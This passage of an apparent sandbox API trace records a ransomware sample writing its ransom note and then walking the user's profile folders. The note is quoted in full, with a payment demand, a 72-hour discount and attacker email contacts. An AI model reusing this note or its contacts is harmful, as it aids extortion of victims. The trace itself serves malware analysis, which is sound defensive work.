lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0180.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2aea410 [0180.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9ba8 | out: hHeap=0x2c0000) returned 1 [0180.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adef10 | out: hHeap=0x2c0000) returned 1 [0180.631] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0180.631] WriteFile (in: hFile=0x580, lpBuffer=0x2aea410*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x2f9fb64, lpOverlapped=0x0 | out: lpBuffer=0x2aea410*, lpNumberOfBytesWritten=0x2f9fb64*=0x45c, lpOverlapped=0x0) returned 1 [0180.633] CloseHandle (hObject=0x580) returned 1 [0180.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea410 | out: hHeap=0x2c0000) returned 1 [0180.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0180.635] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0180.636] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.636] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0180.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7568 [0180.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.636] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0180.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0180.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0180.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0180.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.638] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0180.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0180.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0180.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0180.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.639] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0180.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0180.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0180.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0180.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.642] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0180.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0180.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0180.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0180.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0180.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.645] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0180.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0180.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.645] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x300fe8 [0180.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0180.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0180.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0180.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0180.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0180.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.668] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.668] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0180.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0180.669] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0180.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f00 [0180.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f48 [0180.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f90 [0180.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0180.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0180.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0180.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0180.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300fe8 | out: hHeap=0x2c0000) returned 1 [0180.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0180.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0180.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0180.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0180.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.673] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0180.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0180.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.674] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0180.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2eb38 [0180.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0180.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eb38 | out: hHeap=0x2c0000) returned 1 [0180.675] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0180.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0180.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.675] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xadfc6210, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, 